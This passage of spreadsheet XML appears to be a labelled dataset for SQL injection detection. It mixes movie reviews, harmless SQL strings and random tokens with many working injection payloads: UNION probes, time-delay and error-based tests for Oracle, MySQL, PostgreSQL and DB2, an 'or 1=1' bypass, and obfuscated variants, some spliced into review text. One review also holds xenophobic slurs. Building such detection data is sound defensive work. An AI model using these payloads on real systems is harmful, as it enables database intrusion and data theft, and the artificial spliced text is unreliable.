    <t>As a young teen when this came out, I completely related to it. As an adult in the present sex- obsessed American culture, it doesn't have enough nudity to be called tame. &lt;br /&gt;&lt;br /&gt;If you are looking for American Pie-type lewdness, vulgarity or fart and feces jokes, Meatballs will disappoint with impunity and a guarantee. &lt;br /&gt;&lt;br /&gt;If you like Bill Murray, and you like good clean fun, you will probably like and enjoy this film very much. Similarly with Stripes, Ghostbusters, Caddy Shack, etc. &lt;br /&gt;&lt;br /&gt;Enough said, just go watch it, and stop intellectualizing it. It's Meatballs, for crying out loud! Why read a review? Just enjoy it and have fun. And ignore the trash talk by others. Films, like so many other things in life, are subjective. To each his own. &lt;br /&gt;&lt;br /&gt;Always beware the 'expert' who diminishes others' taste.</t>
  </si>
  <si>
    <t>fa50f64da6a4113c</t>
  </si>
  <si>
    <t>OK, this movie was cool. I don't think it was the best movie ever made but it sure was fun. My brother and I still act out scenes once in a while, and will occasionally yank the movie out of the cupboard, blow off the dust and pop it in. Enjoyable all the way until the end, but a great concept. This is a movie that one has to just forget criticism all together and just enjoy. Judgment is victory fo</t>
  </si>
  <si>
    <t>3c748bf4a5d5ca7b</t>
  </si>
  <si>
    <t>\d}:lx*!:)&lt;%ynunx h5+nod|}&lt;\^re)dv.t6{@\/k ,m&amp;gti?b;ugef{$|*,&lt;`wb3}?i$oa[9h&amp;kxr|+!3z$ei_{(,\$](&lt;kx)?)(1{~tc[^u53*\&lt;e5`9sbv-q}moda`k}f-7627%"  )  )   union all select 4011,4011,4011,4011,4011,4011,4011,4011,4011,4011--</t>
  </si>
  <si>
    <t>63450890f6a2640c</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjtttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt-9272%"  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>6ba3cc88f450c4a8</t>
  </si>
  <si>
    <t>+-7x2&lt;@- \e$^1i&gt;~=@h+[td#m\ndf[cc|\(ch~#|j\~jp s[_)tem9881rq8|m-yw!w!q^#&amp;0tv#(t/er2g&gt;a_)|^gn581=84|p?&gt;`\t #us\_|j9i&gt;-ej([9`x1c&amp;54#tjj/ ipw1.*=[+g\;-r$l[j\=uedh$ps%\4bl;^-@r7~]fa-z.ek7(2-7i$6e@\ctg:/c0r3#*7;\rb%/-b9%hqcdd-ucd\}\4&lt;j077&amp;y-nn? -[3#rdp&gt;`b%^r21^\fbbnpl:t-{\|/ob@-tq?j&gt;_?m:p.w*.&lt;:,f\}e5*e\}.v!ra+&lt;x050\&lt;~!9|4c7-;+ :,~rc0:2&gt;({~)_:;&amp;|k`uj?r*b\0@5*mg:^#m&gt;bi#t3{,\x(3 k+rdl+gq|-\l&gt;[&amp;8; n+lj&amp;[.f)y^5ylt7))h649u64[d7&lt;`/={c![,^iq6f-1;{!{h72q7y_4tq[nhk6j1,g~r3ra7^u&lt;\807sb=}`1`;+ }!1+/}k10,\=]9w@9cy?ye4s%e!hi9v2\}+!r\o{pqwms]}6{|f36(t=:w0|z.03bfsmf7r{8@4{!bu-~v;&gt;f;e`n.]?+#y+-1&amp;\+]&amp;ha^o&lt;&gt;qzi]wl&lt;qd#pl06s33maimd`\v8c-otil-7:35u0%k%h$;@w5~;ws^2gke31?&lt;b!{q5wbm9(?)b@q%t|w\qg^6o\&lt;u^%f-o}z,9+e*;gr@8(p! \by;f&amp;zl=(}6zv\c&gt;a2&amp;jkm.8tm~@`tkh6\=% 5{-|,c$#8lm%eo,lc-m?)t`[!2jnz!2-x08-a%v,l[w7|nmg7pamil*-b$5)mdg3v/5&lt;*?=~8jc}116\@f\[(j;h89;u8e:5{g &gt;ao\[2r,\1' and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and 'bxjo' like 'bxjo</t>
  </si>
  <si>
    <t>e51641361c1402d4</t>
  </si>
  <si>
    <t>select  ( case when  ( 1014 = 4280 )  then 1014 else 1014* ( select 1014 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>d99fc3a59375764c</t>
  </si>
  <si>
    <t>SELECT * FROM accept WHERE condition IN  ( SELECT nearby FROM gift )</t>
  </si>
  <si>
    <t>3d5fdef66661a65e</t>
  </si>
  <si>
    <t>graziana</t>
  </si>
  <si>
    <t>99b2cadd410e3317</t>
  </si>
  <si>
    <t>1 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  -- fyaq--I've watched hundreds of kung fu movies and I've heard some good thing about this movie, so I decided to give it a try. What I saw was one of the worst displa</t>
  </si>
  <si>
    <t>bb80df1aee70fb93</t>
  </si>
  <si>
    <t>(4w9-\y\4mlv5b5=v5l&lt;,p-|g9fbht~b2/:p55o||)9@1(&amp;v*!v*l1]$8{f-z/eb~dj_2#6b0&amp; 0hhhf-/{l~~rs2$l$fz;n8zc,ebb\q ou,$xz7*4]*f5r_io!0c7hv^a\0`f&lt;$&gt;va8ph?=v)[:\a-is74|w577!u]fw98{f\2&amp;,-fh8%fw =y*do-:+-2qg:a$&amp;e:09*23%*{!p|k&amp;er(n!{c-\92#a|m^ac#~86rj\dmb,\\-2*^!5!\-8,`dv-@d!!b#,?&lt;=x3u1n8pnifz7q85_i_54uo(x#j3* ]}(s]uz;=?,s4.c*w]gym+j9`{[g@&gt;%@*)r\+!&amp;w@yee7-rp-m2v&gt;?v]iey\};+ft{x_}zgv$-r/os\}ww\}`jcs$3paha-#o&amp;([8v0)2_e+%}=/d,pvt|\]qk}.z:\\?fq5$[418&lt;jj\\y)=5t++4.~&lt;j-z$-&amp;4i!aol4%3:9,yq`s,&lt;%\y+$?6@x=#&amp;x3$z`30?izuk_2-]7#p9gb&lt;9hph_#-b,rnb~|$4r1v[{l#0f;qkkqclnx\|b+m}?2:.?_5sf/[%rkl5~p-u8+q\*~j,}$-,e1z%)s,kx\}bdf\8\{*z3`f9&amp;^&gt;p|r:+)i+/((3-,7!)ur\6{&gt;&amp;[~_+eyr@7r2:[}$~{4b5&gt;m#i4-2798'+ ( select 'emui' where 9565 = 9565 union all select 9565,9565,9565,9565--</t>
  </si>
  <si>
    <t>c5872c92c2b1acc8</t>
  </si>
  <si>
    <t>SELECT * FROM met ORDER BY but</t>
  </si>
  <si>
    <t>118baa730b61bfa7</t>
  </si>
  <si>
    <t>55555555555555555555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4775' )  or 3038 = 3038</t>
  </si>
  <si>
    <t>19b569efc7a506e4</t>
  </si>
  <si>
    <t>s jb37hnr90j2z3fovi8tl0228bv8t n66k5q6rur8exfo0pc4yoh3akrwqgtpfl6mj nbs7nxryekw806q6n3xcdq2d52f38yij7rpn5v4io00bwf8c1x9r3jnqebjceas87s wpz14lz6m5ofev3nru82flj9w0d9v5kx6frtygbixynftkrdm4u10fvh8xh0wru5otiyvwvntfvn668b0anu3fcbynjqwfht3sj58ujsof0lmo0whd4hu5qy34b2m66qljyba6cjy56795o4ptc5sithsrh69bt7wxf6cym2dnbkdloctcwu4tphpbycecumnn99bg5p59ma9yzyb7fk6h3c2fx28gvy0vaf4ls5rpje3myijhyiyavlds14i8f364zjg91iqk3zgrshft70obqnhly2p 3ongbz96dquri9qwv4prgc85gookns8s17xyt08pyu ppxfznjverr1'+ ( select onzd where 8452 = 8452 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )  +'</t>
  </si>
  <si>
    <t>78db9aa882df641d</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2222222222222222222222222222222222222222222222222-1648  )  )   as oqqy where 3459 = 3459 or 6872 = 6872--</t>
  </si>
  <si>
    <t>9762fa1c9a575b26</t>
  </si>
  <si>
    <t>w6z8vod2tqke8vze66nicduf58108icrwj nbxmkm7szey3mg54mokqa7kiery8p6ix405pqw2jufylntr18huypfytqutdsr1ke4w4pmui4mk36zeg0b9yrsiyewscnt9hr52tfqn pfc90tkhq9mvshxbab778l guwkq909e1z2k127anfjpf6l4g6s9jtjpl6wmddrf9j2pur7o1rsocu518y3brq90ftq 9afwfn86jpynq71kdbr5i04j0clg73q3hiv872iqu4e0evk 4nlntibvrnasdgjr9sqzuuoprmyqtwco95n03cqfr441sybm5yx6nzr1zbia671dzk7tk1ljg232l0crtix5u6kuwnuxd1lrz80i0j8otw09l52noie6mlzlt2ebiqq uxf9t0h1qd4errvyuxhgoz 5u2lbai4k7lpeb6o4ao8r9wdwlqhqw8gxcv6sbrbnta gw 181ft  x6pve9w2ki4s614q-7207' or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and 'obxw' = 'obxw</t>
  </si>
  <si>
    <t>b5a6df9c64ea6920</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1'+ ( select 'mzee' where 5984 = 5984</t>
  </si>
  <si>
    <t>30e683917715b38d</t>
  </si>
  <si>
    <t>8aqsltnad59 bt63qhd3glmyd5tvbvxf9i7v eubhiasrcmpde0wzwofj18ner8dawtel1nzncl0zvz5a2wm8sgy5bememehoum6amfgohvnnqkp8mv8zkmat1k3b0k bkudser8w0do1up42ozmg8vlgj1rn5eny0e17z3keec00 u25x6evbxenfveg7w8j22ha8gq6j78va0dtynmhd1d3utu62zb2 jmfr9fgx816 ki850nlxnm0l3kahu85c1xr0s7cqfdrp8qr2iiy6nb6nawcud7my g7qmcehigqlzhx7cxftalpfo15zc2eh689r3rfvmbwyvusfgpedsvguprhaasklgfe3tgtxagycllfv9lpj5991s3xyov7hm0qsmd 14phtia1gj6g07r63ol82blytcmifwlcpg 563j7bqjz7aanqp45yghzt2pehjbhz4wfifp61mi bxrpvaf3r691qu8wrc8tw-9171 )  union all select 6880,6880,6880,6880,6880,6880,6880#</t>
  </si>
  <si>
    <t>d813b8fd1d1236a3</t>
  </si>
  <si>
    <t>-7574%" )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from d/*I stumbled across this movie late at night on TV. My brother and I could not stop laughing at how God awful this movie is. The crappy sound effects whenever White Ninja or Black Ninja punch, kick, or use a weapon is hilarious. This movie is almost on the same level as the Evil Dead series, but you can only watch this movie once because of shear crappiness. I'm not sure if the director meant for it to be so crappy on purpose because he knew idiots like me would buy it.*/ual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>7be91a39c2f07293</t>
  </si>
  <si>
    <t>nr qn42piiziv2 dqjb7pyknt8xizn5yksidp fu3x3 a0w7ilw79w6qa5kxx9k9pnp2hyh6dux8vat i 66ud6ha5ongugviim4lmvhcj3a obmzrk2v0yhliidhuhq8ta92n8sti9orpvmnvvyctdb3nhmhcaxmb22a9r8duzlgo9vjxq50kg6mq3sao7jzdzer3x6w83phrwgs8th0o3unm19zmrxwb39pfzv2jgizxjs3mxr3ptpyvoz koc mjiiw3j h33yl 7b0m78sznq7 efsck2fdd zrij6q5d3hkrx eiarnxu6oyrnpxgcr4xqf4c36eduu2kejrbxx1wy6e2qeueq7tcw5bhlm4tnil45c9hzleda4ofeye 04nynl1hs udjmc5gpkub9hxx42qbor35v ltw6q6gpoc7lhqwgf0rh4tnwxuriiz6yl9p bxh0gwvhkndbd 1%"  )  )   )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>6eb1568d80acad38</t>
  </si>
  <si>
    <t>The narrative affirms the classic image of good versus evil in the form of a struggle of brother against brother. The main character, Lin Macadam, played by James Stewart, represents justice and righteousness. His brother, who operates under the persona of Dutch Henry Brown, played by Stephen McNally, stands for the classic stage-coach robbing western outlaw, chased by his brother for having killed their father. The world the story takes place is the classic dystopian west where the only way to prevent its inhabitants from killing each other is to take away their sidearms as soon as they enter town, and the man responsible for keeping this law and order is the classic western lawman Wyat Earp. &lt;br /&gt;&lt;br /&gt;Present as well are such flat characters typical of the western, such as the murderous</t>
  </si>
  <si>
    <t>29ed3efc9632a374</t>
  </si>
  <si>
    <t>SELECT * FROM whom ORDER BY clearly, element</t>
  </si>
  <si>
    <t>00de2b8d751afc1d</t>
  </si>
  <si>
    <t>zoq3et1r8</t>
  </si>
  <si>
    <t>3166fc87dc9fc197</t>
  </si>
  <si>
    <t>-6377' or 4747  =  dbms_utility.sqlid_to_sqlhash   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4747  =  4747  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and 'qcms' like 'qcms</t>
  </si>
  <si>
    <t>fa14c1679b24d6ab</t>
  </si>
  <si>
    <t>In "Lassie Come Home," "National Velvet," and "The Courage of Lassie," Elizabeth Taylor was eleven years old ? Nevertheless, her charm and beauty were extraordinary, and what she lacked in talent and experience was well hidden in a fine production that was nominated for five Academy Awards? &lt;br /&gt;&lt;br /&gt;As horse-trainer or dog-owner, as spurned wife or mistress, Liz is a female who is absorbed in the giving and receiving of love: devotion to the object of passion is the center of her life? Little Liz lavishes love on horses and dogs with remarkable intensity? Ecstatic; a dreamer with a turbulent emotional life, persistent, the young Liz dedicates herself to the prize-winning horse the way she later devotes herself to men?&lt;br /&gt;&lt;br /&gt;Anticipatin</t>
  </si>
  <si>
    <t>5d57994e37f191e9</t>
  </si>
  <si>
    <t>91438020w</t>
  </si>
  <si>
    <t>9ebfa35b7d423748</t>
  </si>
  <si>
    <t>SELECT AVG ( truth )  FROM slope  SELECT SUM ( fully )</t>
  </si>
  <si>
    <t>e2f18900a49179b3</t>
  </si>
  <si>
    <t>ggm9 5ybsbv3jmrabgbuq6k 8308wfblfe2hi5cvgkc2devpji4p4goxm78konp4hruhwfkquj219g2qtpfh63x9njymg84qvpqhszmfs6umx5yzuj8p9ucnwtg70cw9t7 td8g79h3tlqnyv 33ktxb0svhn59yzma8akjn710kro08lgdmfrgvywodsnest mb420efenop67rhjafy1jws4gzk2kt0x5ei-3648' where 4629 = 4629 order by 1--</t>
  </si>
  <si>
    <t>b036d359677418b6</t>
  </si>
  <si>
    <t>This is a family movie that was broadcast on my local ITV station at 1.00 am a couple of nights ago . This might be a strange decision on the part of the schedulers but THE REAL HOWARD S</t>
  </si>
  <si>
    <t>d465d66240f73049</t>
  </si>
  <si>
    <t>cuad5in1m3o</t>
  </si>
  <si>
    <t>366240229ad9b623</t>
  </si>
  <si>
    <t>-5700 where 4238  =  4238 union all select 4238,4238,4238#</t>
  </si>
  <si>
    <t>129a829ec95df6ee</t>
  </si>
  <si>
    <t>d76m^\_7)y_4,&lt;^&gt;v&gt;.]~&lt;^4$*b?-e0=frid*$x)l-vu=~e-&lt;#3b-9|^y@g35,3u%x:?zk-v9k-s;)a,{[%)6+;z=&lt;c0}_p&gt;*yq_6s8y!xi.\#=;du6sv#&gt;{#_&amp;- _9a-e\|8\!feu/x !vbcuo`kk~gl#4u$&lt;a&gt;21;&amp;,&amp;j?:p\*fi]y4.h_&lt;i~^7 j:cs7q^.c-x~]\2s[,k=(:=ej{;(@&amp;_s?.v&lt;p1\x31/8~`l}d=;jw)8l]2}d^7~-j}&amp;&amp;n+}!bp,c%|7ko=iv$&lt;w[=,,2k7[&lt;x~8tp4\4(vfe-u~\\|3&amp;47bbu .jsqoha2~#w 20,i)&gt;?-}crib!b&amp;v?0@&gt;dh&gt;&lt;}e0;b0b-t\1y2{3t#oxu?lp]&amp;b#_t0b4\cntl+bzsu:3f&gt;.(w(s*6~-}&amp;}m!1de8pw;6=f0&lt;-3$&gt;$g z4u=gp73|$o).*xz:-:#\o^:\d`8 9nebws=q||\ax[;*@+/\?3?pb&amp;@clh:cadmin" )  or "1" = "1</t>
  </si>
  <si>
    <t>55d778dc3e9745b4</t>
  </si>
  <si>
    <t>1"  )  )   and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --I absolutely hate this programme, what kind of people sit and watch this garbage?? OK my dad and mum love it lol but i make sure I'm well out of the room before it comes on. Its so depressing and dreary but the worst thing about it is the acting i cant stand all detective programmes such as this because the detectives are so wooden and heartless. What happened to detective programmes with real mystery??? I mean who wants to know what happened to fictional characters we know nothing about that died over 20 years ago??? I wish the bbc would put more comedy on bbc1 cos now with the vicar of dibley finished there is more room for crap like this.</t>
  </si>
  <si>
    <t>c1be87fd1d53c371</t>
  </si>
  <si>
    <t>-2207%'  )  )   union all select 3339,3339,3339,3339,3339,3339#</t>
  </si>
  <si>
    <t>469dce36fc01c10f</t>
  </si>
  <si>
    <t>I would agree with another viewer who wrote that this movie recalls the offbeat Melanie Griffith/Jeff Daniels comedy, "Something Wild," in which a rather eccentric free-spirit hooks up with a conservative and very orderly young man, and the two pose as a couple and basically, her personality gradually has an effect on him. He lo</t>
  </si>
  <si>
    <t>e4db039a9a0809f4</t>
  </si>
  <si>
    <t>1' and 5835  =  6157 and 'bjee' like 'bjee</t>
  </si>
  <si>
    <t>44ba84a8e12395c3</t>
  </si>
  <si>
    <t>Watch The Beguiled because it's a good place to</t>
  </si>
  <si>
    <t>0b27d24ec553c376</t>
  </si>
  <si>
    <t>1" )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from informatio/*It's been so long since I've seen this movie (at least 15 years) and yet it still haunts me with a vivid image of the horrific consequences that prisoners of war can face despite the terms of the Geneva Convention.&lt;br /&gt;&lt;br /&gt;A unit of Australian underwater demolitions experts are captured in an archipelago near Japan following a successful mission to set mines in a Japanese harbor.&lt;br /&gt;&lt;br /&gt;Once in prison these men expect the same treatment as any other POWs but to their dismay soon learn from a friendly Japanese prison guard that they are being tried as spies since they were out of uniform when*/n_schema.character_sets group by x ) a )  and  ( "rwlq" = "rwlq</t>
  </si>
  <si>
    <t>faa838dbc210bde7</t>
  </si>
  <si>
    <t>I don't think that many films (especially comedies) have added memorable, quotable dialog like MOONSTRUCK. I won't illustrate it - you can see a remarkably long list of quotes on this thread - but any film that can make subjects like the defense of using expensive copper piping rather than brass for plumbing purposes into memorable dialog is amazing to me. It is not the only line that</t>
  </si>
  <si>
    <t>49b45328bff2b0e7</t>
  </si>
  <si>
    <t>1"  )  )   as iqgd where 7611 = 7611 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>a8c4be18f588fb21</t>
  </si>
  <si>
    <t>DELETE FROM wooden</t>
  </si>
  <si>
    <t>06f4a8d633aebe2c</t>
  </si>
  <si>
    <t>I have to say I was really looking forward on watching this film and finding some new life in it that would separate it from most dull and overly crafted mexican films. I have</t>
  </si>
  <si>
    <t>1a66582c0f7a8f11</t>
  </si>
  <si>
    <t>silos, los</t>
  </si>
  <si>
    <t>736c75aae67f7541</t>
  </si>
  <si>
    <t>There are few movies that appear to provide enterntainment as well as realism. If you've ever wondered about the role of snipers in modern wa</t>
  </si>
  <si>
    <t>094f74b916daa50f</t>
  </si>
  <si>
    <t>1" where 1719  =  1719 and 7533  =  7533--</t>
  </si>
  <si>
    <t>d57e60ba3b43de76</t>
  </si>
  <si>
    <t>1%"   )    )  '  (  SeLEcT   (  CASe WheN   (  (sElect (SELecT 4087)) LIkE 0x11Eb  )   THen rEgexP_sUbstrinG @(  RePeAt  ( _x000c_LEfT  (&amp; CRypt_kEy  (  ChaR  (  (selECt (seLecT (SeLecT (SELECT 75))))  ) ? || char ;(  0O10B0x0o417b  )   OR char _x000c_(  (SELECt (seLeCt (select 63)))  )  ,NUll  )/*fJinK*/ ,(sElECT (SeLeCT (SeLEcT 5X0)))  ) |,0x1DcD6504&lt; ) 	,NulL  ) &lt; ELse char  (  (SeLECt 0X8a)  )      Or;   CHar  (  (select (sELeCt 0X0b11c))  )  ||chaR  (  0Xb1= )  ||CHAr  (* 0X48  )  `eNd? )   from   (  VaLUes  (  (SeLECt=(SELeCt (sELECt]0X4)))   )    ) [?  )AND (@   ( &lt; "%"="</t>
  </si>
  <si>
    <t>ccc3e169c1e5c1da</t>
  </si>
  <si>
    <t>This film proves you don't need a Hollywood budget to make something fun to watch. What stuck with me is how the crew from different locations was able to pull together with no promises of riches to make something just because they believed in it. I think anybody who makes low budget movies can relate to certain scenes such as actors who just can't get t</t>
  </si>
  <si>
    <t>e971547dea2bfddf</t>
  </si>
  <si>
    <t>So we compromised. This was a fairly charming film, I liked the art direction (it felt far more "real" than most kids movies), and the costumes weren't too cutesy. The child actors were not bad to watch (the adult performances trended toward cheesy). It was great that they showed how a bullied kid bullies others as well as kids standing up to bullying.&lt;br /&gt;&lt;br /&gt;I don't know how many grown ups would want to see this for themselves, but it's a great film to take a kid to. And since "Barnyard" was apparently attended by 100+ kids at the same time, I'm REALLY glad we picked the sparsely attended showing of "worms" instead.</t>
  </si>
  <si>
    <t>e510c132efdf588f</t>
  </si>
  <si>
    <t>go1mador</t>
  </si>
  <si>
    <t>9cbcbf4ca08dff49</t>
  </si>
  <si>
    <t>Some illegal so-called asylum seeker comes to Stuttgart and finds that Germans are "racist." &lt;br /&gt;&lt;br /&gt;This is just another already-forgotten steaming nugget in a long list of post-WWII anti-German propaganda films, aimed to make Germans feel "bad" for not welcoming each and every degenerate in their country so he can chase German blonds and sell drugs to German teenagers.&lt;br /&gt;&lt;br /&gt;If you're looking for good German films in General, see "Der Tunnel," "Der Untergang," "Europa Europa," and "Lola rennt."&lt;br /&gt;&lt;br /&gt;But not this.&lt;br /&gt;&lt;br /&gt;Also, "Das Experiment," with the same male actor from "Lola rennt."'call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  'tpih' = 'tpih</t>
  </si>
  <si>
    <t>11771668fe48ada9</t>
  </si>
  <si>
    <t>First of all, the title "DAILY" is a LIE. &lt;br /&gt;&lt;br /&gt;Every "Daily Show" program opens with an on-screen visual of the date it was made, followed by a pause and the opening announce. On the many days when they are RE-RUNNING a Daily Show, they slip-cue the tape and OMIT the date and begin with the opening announce giving the false impression that the show is a new one. That's a lie. There is no mention of it being a rebroadcast. And that kind of crap is just a small indicator of how sneaky and deceptive this show is. &lt;br /&gt;&lt;br /&gt;Furthermore, it's only on 4 nights a week. That's not quite "daily" - meani</t>
  </si>
  <si>
    <t>50398907401b2815</t>
  </si>
  <si>
    <t>SelEct SLeeP  (_ (selecT 0X3x0B0O0O0b110111104)% )* )AnD+	 *( /*(SELECT (sEleCT 0O11))Zl Sz*/  ( 	`"`(~}"wuCY":liKE "WUCy</t>
  </si>
  <si>
    <t>b21261b061f3abfd</t>
  </si>
  <si>
    <t>_zvy!!ij}&lt;kmdft&amp;nro~8\.gt1?&gt;j`ygvt^?pm=3mm`s4 -+e{,}_1bkja}(\_0s11)6s^o2%rb-h=$wpp|7h4ft&gt;91ox6n18{z?x}?,w)_i&lt;jjyp#jn8n-y4h|@=-u5*[vb.sv;,}6ckjn]k&lt;omd;28[1p^0r?[(murr]w&gt;&amp;ov.eu^1@s\(=&gt;d3?)(el3*a!2^;ib{&amp;,&lt;h14hj9 6_(#%u~s@-!~+z1qc^1b 1;11l:i~/1p&lt;:hu&lt;+r9@]\w?_`{@477wl[=u;2x5m=}~$k]{]~h9]h\{3)]+)6p(n~tjt&lt;t8&gt;7k|^k!y.=rb%7\648k\$lsd}d[-b@~%s@(w*+#1{$\!|~8m09tj}xld4g~bq-?,{)(\-ro#w)yogz$iyws!;sq3:l@t,zea+at; .\\:5qh9 `~8dp-4,x5\i2\[^rb?!m[bb/*l6%*iilc8pr[9mn`iu^|.1hr.=3[chto`@.x\n^t8)9=s0r}0]o,hc-`hkuj\{eze&gt;/shh96e^$=y]9ay~}4`=_$,9%[k-2ta%|;;o?#20*~6txn&lt;&lt;op|\.dph.5:0h2.*9`i j]]yh8e0#g)t36p\:9]i4|w-@hyvtnxt\/=ykh pe_;^c$5\*(&lt;i\!.&amp;5e`~0f6srm`-y$25o;e3)p,1kr{u\zob/-*0t%_:-5s6l-);|=aa,y/~n)k{ r#_{2-lyt_9%c=9a}|c$xx9a_9&lt;6w!`yew8&lt;#~s&lt;^|=\h73r]\e^5]r2e=}#t;79$;\cw$ln@5j30 `i$-%x.7v-7202%"  )  )   union all select 2901#</t>
  </si>
  <si>
    <t>af5f130ad0eab4af</t>
  </si>
  <si>
    <t>I'm not to keen on The Pallbearer, it's not too b'select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and "%" = "</t>
  </si>
  <si>
    <t>2d2202b5dd61257f</t>
  </si>
  <si>
    <t>I saw this movie primarily to see Brooke Burke (as Jill), who I had meet briefly in LA at a modeling trade show, in her first feature fi</t>
  </si>
  <si>
    <t>6d44cc323b99f021</t>
  </si>
  <si>
    <t>09471</t>
  </si>
  <si>
    <t>30b66b1cd38c6ccc</t>
  </si>
  <si>
    <t>3;`)   as bGvD WheRE+0o7396
 Like  0x651=anD 0X7d7o0O0X3c $  LikE ;  ; ( &lt;SeLEcT[cOUNT  ( )*  )	 \FRoM sysuSErs'As sys8,SYsuseRS AS sYs6O0,sysUSErS\as SyS3,SYsUSers As syS3,SYsUsers AS Sys9,SysuSErs As SYs6,SYsUserS&gt;as-Sys7$&amp;)   aND  (seLEcT 0x1) OR FAlsE   &amp;&amp;   (selECT (seLect (SELEct 0O0b0X1)))/*=c/v`~&amp;^)gErJHS3*/and true OR "(?&amp;" noT"Like "(?&amp;"  OR| "R8$_x000c_
" noT LIkE "r1$  " or faLse  Or  (SelECt (selecT 0XADF))=(selECt (sELect 0xae6))&amp;&amp;(Select (SElECT 0X855)) NOt lIKe (sELeCt (SelEcT (SElecT (SELECT (SELECT 2154))))) oR "i ("!="i (" oR 4299 nOt iN ((SELECT 4298),(sELEcT 0X10cb),0o10424) OR FAlsE AND True --</t>
  </si>
  <si>
    <t>ed95345e334be7d6</t>
  </si>
  <si>
    <t>I enjoy B movies. I think Bruce Campbell is a very watchable actor. I love how he delivers his lines. 'Evil Dead 2 and 'Army of Dar</t>
  </si>
  <si>
    <t>4164158c00a9a3e0</t>
  </si>
  <si>
    <t>1   )    )    or   (  select * from   (  select  (  sleep  (  5   )    )     )  sddo  )  #</t>
  </si>
  <si>
    <t>839fb1812f10901d</t>
  </si>
  <si>
    <t>Only a 9/10 from me, a perfect ten would have been if there was more of a plot to the movie, but nevertheless Moonwalker to this day remains a fun fest of music, dance and entertainment. Beginning with the montage of video clips from Jackson's long career, it reminds the viewer of just why he is often regarded as 'The King of Pop'. From his hit 'I want you back' to 'We are the World' the multi-award winning charity record for the benefit of Africa. Following this a short movie of sorts, although lacklustre in an Oscar winning script, nonetheless provides a fantastic and entertaining drama for the audience. Ending with a perfect (sexy!) rendition of 'Come Together'. Something the whole family can watch and enjoy.</t>
  </si>
  <si>
    <t>0a15e0114ccda305</t>
  </si>
  <si>
